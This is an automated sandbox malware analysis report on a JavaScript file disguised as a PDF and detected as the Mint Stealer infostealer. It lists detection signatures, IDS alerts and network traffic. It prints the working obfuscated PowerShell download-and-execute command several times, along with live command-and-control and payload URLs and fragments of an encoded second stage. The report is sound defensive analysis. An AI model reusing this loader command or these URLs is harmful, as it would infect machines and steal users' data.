Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
_DRP12938938231_PDF.js

Overview

General Information

Sample name:_DRP12938938231_PDF.js
Analysis ID:1556633
MD5:b05ee915cdbdb359f19b8e42acebaf48
SHA1:f8a4866dd81dde78f6f1a1e11a9594fcbce71612
SHA256:41facb3e96a81c04259c40c2170e6dc53047838e0f918dba889fc6510bc4374d
Tags:jsuser-malrpt
Infos:

Detection

Mint Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mint Stealer
Creates processes via WMI
JavaScript source code contains functionality to generate code involving a shell, file or stream
Loading BitLocker PowerShell Module
Obfuscated command line found
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5884 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • conhost.exe (PID: 2848 cmdline: conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt) MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2356 cmdline: powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2356JoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: WScript or CScript Dropper
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", ProcessId: 5884, ProcessName: wscript.exe
    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js", ProcessId: 5884, ProcessName: wscript.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt), CommandLine: powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt), ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 2848, ParentProcessName: conhost.exe, ProcessCommandLine: powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt), ProcessId: 2356, ProcessName: powershell.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-15T18:16:26.759187+010020570631A Network Trojan was detected192.168.2.649807206.188.196.2580TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-15T18:16:31.953945+010020387553Misc activity192.168.2.6626221.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-15T18:16:31.016324+010028566541A Network Trojan was detected192.168.2.649834206.188.196.3780TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-15T18:16:29.491742+010028590031Domain Observed Used for C2 Detected192.168.2.6583941.1.1.153UDP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: http://gidcldeaccadneh.top/q961kig3lwhtr.php?id=user-PC&key=111108474762&s=mints21Avira URL Cloud: Label: malware
    Source: http://gidcldeaccadneh.topAvira URL Cloud: Label: malware
    Multi AV Scanner detection for submitted file
    Source: _DRP12938938231_PDF.jsReversingLabs: Detection: 15%
    Source: unknownHTTPS traffic detected: 51.91.79.17:443 -> 192.168.2.6:49847 version: TLS 1.2
    Source: Binary string: e.pdbD"% source: powershell.exe, 00000006.00000002.2517545990.000002217F834000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.2515555470.000002217F5A2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.2515555470.000002217F5A2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb source: powershell.exe, 00000006.00000002.2447822877.000002210009D000.00000004.00000020.00020000.00000000.sdmp

    Software Vulnerabilities

    barindex
    JavaScript source code contains functionality to generate code involving a shell, file or stream
    Source: _DRP12938938231_PDF.jsArgument value : ['"conhost --headless powershell $xyhqerilkpf=\'ur\' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea']Go to definition
    Suspicious execution chain found
    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.2.6:49807 -> 206.188.196.25:80
    Source: Network trafficSuricata IDS: 2859003 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.2.6:58394 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2858291 - Severity 1 - ETPRO MALWARE TA582 CnC Checkin : 192.168.2.6:49807 -> 206.188.196.25:80
    Source: Network trafficSuricata IDS: 2856654 - Severity 1 - ETPRO MALWARE TA582 CnC Checkin : 192.168.2.6:49834 -> 206.188.196.37:80
    Source: Joe Sandbox ViewIP Address: 206.188.196.37 206.188.196.37
    Source: Joe Sandbox ViewIP Address: 51.91.79.17 51.91.79.17
    Source: Joe Sandbox ViewASN Name: DEFENSE-NETUS DEFENSE-NETUS
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: Network trafficSuricata IDS: 2038755 - Severity 3 - ET MALWARE Observed DNS Query to Temporary File Hosting Domain (temp .sh) : 192.168.2.6:62622 -> 1.1.1.1:53
    Source: global trafficHTTP traffic detected: POST /aqdnA/138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: temp.shContent-Length: 0Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: sfibhzu3ubhza.topConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /q961kig3lwhtr.php?id=user-PC&key=111108474762&s=mints21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gidcldeaccadneh.topConnection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: sfibhzu3ubhza.topConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /q961kig3lwhtr.php?id=user-PC&key=111108474762&s=mints21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gidcldeaccadneh.topConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: sfibhzu3ubhza.top
    Source: global trafficDNS traffic detected: DNS query: gidcldeaccadneh.top
    Source: global trafficDNS traffic detected: DNS query: temp.sh
    Source: unknownHTTP traffic detected: POST /aqdnA/138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: temp.shContent-Length: 0Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 FORBIDDENServer: nginx/1.18.0 (Ubuntu)Date: Fri, 15 Nov 2024 17:16:33 GMTContent-Type: text/html; charset=utf-8Content-Length: 30Connection: close
    Source: powershell.exe, 00000006.00000002.2449469659.0000022167673000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$4hfinrz9wb6gea5/$g4lnbsurwm0thoz.php?id=$env:computernam
    Source: powershell.exe, 00000006.00000002.2449469659.0000022167673000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2449469659.0000022168890000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$4hfinrz9wb6gea5/$g4lnbsurwm0thoz.php?id=$env:computername&key=$bkxeljfcvmuyir&s=mints21
    Source: powershell.exe, 00000006.00000002.2517545990.000002217F912000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
    Source: powershell.exe, 00000006.00000002.2449469659.0000022168890000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gidcldeaccadneh.top
    Source: powershell.exe, 00000006.00000002.2449469659.0000022168890000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gidcldeaccadneh.top/q961kig3lwhtr.php?id=user-PC&key=111108474762&s=mints21
    Source: powershell.exe, 00000006.00000002.2502580487.000002217728C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000006.00000002.2449469659.0000022167441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000006.00000002.2517384959.000002217F740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic_nU
    Source: powershell.exe, 00000006.00000002.2449469659.0000022167673000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000006.00000002.2449469659.0000022167221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000006.00000002.2449469659.0000022167673000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000006.00000002.2449469659.0000022167441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sfibhzu3ubhza.top
    Source: powershell.exe, 00000006.00000002.2449469659.0000022167441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sfibhzu3ubhza.top/1.php?s=mints21
    Source: powershell.exe, 00000006.00000002.2449469659.0000022168C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://temp.sh
    Source: powershell.exe, 00000006.00000002.2517545990.000002217F834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww1.V
    Source: powershell.exe, 00000006.00000002.2449469659.0000022167441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000006.00000002.2517545990.000002217F834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micros.
    Source: powershell.exe, 00000006.00000002.2517545990.000002217F834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
    Source: powershell.exe, 00000006.00000002.2449469659.0000022167221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000006.00000002.2502580487.000002217728C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000006.00000002.2502580487.000002217728C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000006.00000002.2502580487.000002217728C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000006.00000002.2449469659.0000022167441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000006.00000002.2502580487.000002217728C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000006.00000002.2449469659.0000022168C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://temp.sh
    Source: powershell.exe, 00000006.00000002.2449469659.0000022168DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://temp.sh/aqdnA/138d2a62b73e89fc4
    Source: powershell.exe, 00000006.00000002.2449469659.0000022168DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://temp.sh/aqdnA/138d2a62b73e89fc4d09416bcefe
    Source: powershell.exe, 00000006.00000002.2449469659.0000022168C0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2449469659.0000022168890000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://temp.sh/aqdnA/138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa.exe
    Source: powershell.exe, 00000006.00000002.2449469659.0000022168C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://temp.sh/aqdnA/138d2a62b7X
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownHTTPS traffic detected: 51.91.79.17:443 -> 192.168.2.6:49847 version: TLS 1.2

    System Summary

    barindex
    Windows Scripting host queries suspicious COM object (likely to drop second stage)
    Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3430BD166_2_00007FFD3430BD16
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3430CAC26_2_00007FFD3430CAC2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342FD5656_2_00007FFD342FD565
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342FC6066_2_00007FFD342FC606
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD343045FB6_2_00007FFD343045FB
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342FFE506_2_00007FFD342FFE50
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342F2EFA6_2_00007FFD342F2EFA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3430275D6_2_00007FFD3430275D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342FB80D6_2_00007FFD342FB80D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342F27FC6_2_00007FFD342F27FC
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342FF7FA6_2_00007FFD342FF7FA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342FFFFA6_2_00007FFD342FFFFA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342FF9506_2_00007FFD342FF950
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3430E9026_2_00007FFD3430E902
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342F91D86_2_00007FFD342F91D8
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342F925D6_2_00007FFD342F925D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342F73586_2_00007FFD342F7358
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342F33796_2_00007FFD342F3379
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD342FF3D56_2_00007FFD342FF3D5
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD345B654F6_2_00007FFD345B654F
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD345B74336_2_00007FFD345B7433
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD345D85336_2_00007FFD345D8533
    Source: _DRP12938938231_PDF.jsInitial sample: Strings found which are bigger than 50
    Source: classification engineClassification label: mal100.troj.expl.evad.winJS@4/5@3/3
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sfhutis5.tdw.ps1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $agbxpeohqd4c653.(([char[]]@((-6389+(24590904/3809)),(-10121+10232),(759696/(2167+4616)),(9791-(11612-(1473+(-1632+(6736-4635))))),(600600/(5204+1946)),(-7090+(4698+(-2223+(-3013+(13208-5469)))))) -join ''))( $rc3kpsy5iqlno6j ) $agbxpeohqd4c653.(([char[]]@((168237/(22147020/(41304060/(7609875/1625)))),(-5756+(14215-(5900+2451))),(-9837+(11042-(3123370/2855))),(830760/(13569-6345)),(-2235+2336)) -join ''))()$mwtldurezgn5c07.(([char[]]@((-1502+1569),(54324/503),(-9136+9247),(5600-(620+4865)),(-7827+7928)) -join ''))()[byte[]] $vuwqcj4f05oy7dm = $rc3kpsy5iqlno6j.(([system.String]::new(@((653352/7778),(-8138+(28236327/3423)),(511680/7872),(899118/(899+(34807228/4981))),(986-872),(-9266+9363),(1073512/8872)))))() $egj3lh0sw5anbv8=$vuwqcj4f05oy7dm return $egj3lh0sw5anbv8}[System.Text.Encoding]::ascii.(([system.String]::new(@((642550/(17337-8287)),(-4482+4583),(230028/(7658-(5955-280))),(-546+629),(1025440/8840),(1049940/(8698+512)),(-9205+(76733020/8242)),(-1105+(10005525/8235)),(481937/(-1580+6259))))))((im9873okj54v0usbfgrxq1lehzt "frN6anA1Y2x+d+7uuldvjQXw/Ec6iLD0oB6VHkKvjBLLV0c1u8zbY6AJl61KfflM22BmwyCRRqeMiK2qu+du4ORwPn7N0QpMUueeoapejtGdic6Ol/ejuaPGpKvdqE0MEkqInIjazDKWaG6YvtY9xF6q/PPn6+woj+csVExPFpWOj4eZvMbV4Ud6fQGFHAxMns/ZVe2KHxkPzsyNut2Dj6Xevu+XGFyAAQONGo7JD9+HlAWuMpIB5VnZndzXwrfM9ySLhckQ9MsXO83SMfPg9n8OHXIJWVpYUIC2HUmhe4/IWtbjGAO1gpKBDkU0XovPutFx19SrsL4JoXQPSxl3F6dBcDMY6MXcJZc90a7NxdkkNXo+ko3f/biMpMmv3UAHgkEp4T9GlTHF6tAaFLLTs/FJ7LJX3nXaosoGpF3u2tZEUk6tD8+5jL/SdJMDC4EZn9ORdYYS9PflQKzoXQPMko7dnFrFmQVCDCsoR9kYP7V07A5ZXSX0uxFuK79MTCQoyFlbX4dEu/RwcF9cZ6YWmw0IxwPfO81i0lX/1zwA2K5N6TgBb1Etk04AT/Ht2pRnxO/Orm7e2yg1DnnbifGU+hUZfP5RBFxIbHPGoNHTfx/mDf+TUZbgjV3La0Je2Wg+SCFhRcHXIZci2dY72G2FM5tZjveVyYyL7uO/HF6bRFVWjpkIPIj05SNd0rUfLITMhp0k4VcqWdK9YsqhX22tt8gAklmfa5fOBZYfRBLqh+TGJYMoo8Fbfl4aYMjz/8K9MxTWSocjnQnbYmDkjS1X2/QNDM+J2RbqBXScJDjSX/KiYD3PjBb3E5sWRPCfR4goCIqltnqST7VWqIOQvXqi/wMfbW91UGMBBLLDgYa0878DCr1E12Tktgvp+u9HXvUOAg3ZUm5LCiELxmrEl8OthQbCjNEEhI+HheGEgoLXCdOBjo3IHsGLPA5ahZFFQYW+Pg9NdU1LkhoFjbDm8ictNI3Bnw4Aw6obArDLryR+k0KtWTyGXJ/ku3OMjw8xaqCz+Soz0BTZDfrmDtljEvX/VX0YJ8keB86zrScLxc9M2xUGxkwLkEiBgbd6JdruLxiAYCvieA372hYn7KjPSO60XQepXzmmoQP8IbxNxQXjsPikJS4Nf11krSfJrM2sj4qmfQVLVA1I9M3GGKp8h7DgxjycGzpaNkNyH/HNMZRbMrL2tqHS1Qxz+LnZFoeMi6ykpPORudcKnpyMgsgyOruTlQ3MH6HlurSVloOlVc2Lv9MGh8S+6t8VJc/KlbfJimh0ryR6iFmP4luvojnTVTOaNrq5vJjxI0/8prkRbYj5A01uivOhD2v5X5xDZKgSV3UkTiQCEz421QumSBa2w+BPfR57HL77q2HgTLX+wl2g4karOlp/+vABlPYKkyUznYqOWasTD6yb4u56U/N6f4DXxWc1Jl1b4L9bBcVKUcPX4HcSdfkRVp/okLBNI/qhU6QA+qCDZqUVg/Wqivc+qzJzWfZk25psEWwofB1YUhwglxTn7UHCv/TS2K/xppg3+N66XOwWUrIqNnynabFQMaYQjlf7jKt5I7y29Fq0bcccU1Czz05L653L8blJeElLKu7N0tZmV7Gjhlbaq/M2qdkoB9pno/CZNlpcDD7YthpgPNxQLn7xe/hK+gzzgm/Vt25gJX8OGtcFn4LYa5IGQ7Dwv/bXEd2mk/jHLWD4DZuNatO/iXh6wp+ACp95Cl321EW9m7lK/rdOTrjdcoyOlED4z3ZN+x1gEhpkuQ+YGW/6pG/7lkvLeWjwFmy1OPlTJ9iYeHgCzXDDVutzMOusGtVYyyxn7U3YT2ShwL/x9YrxQHZTh0aFxR0r5uarGrzUbx2rbDdgw0MwTbIOpJXirOeEzVTcwroHOtkTEJ0
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
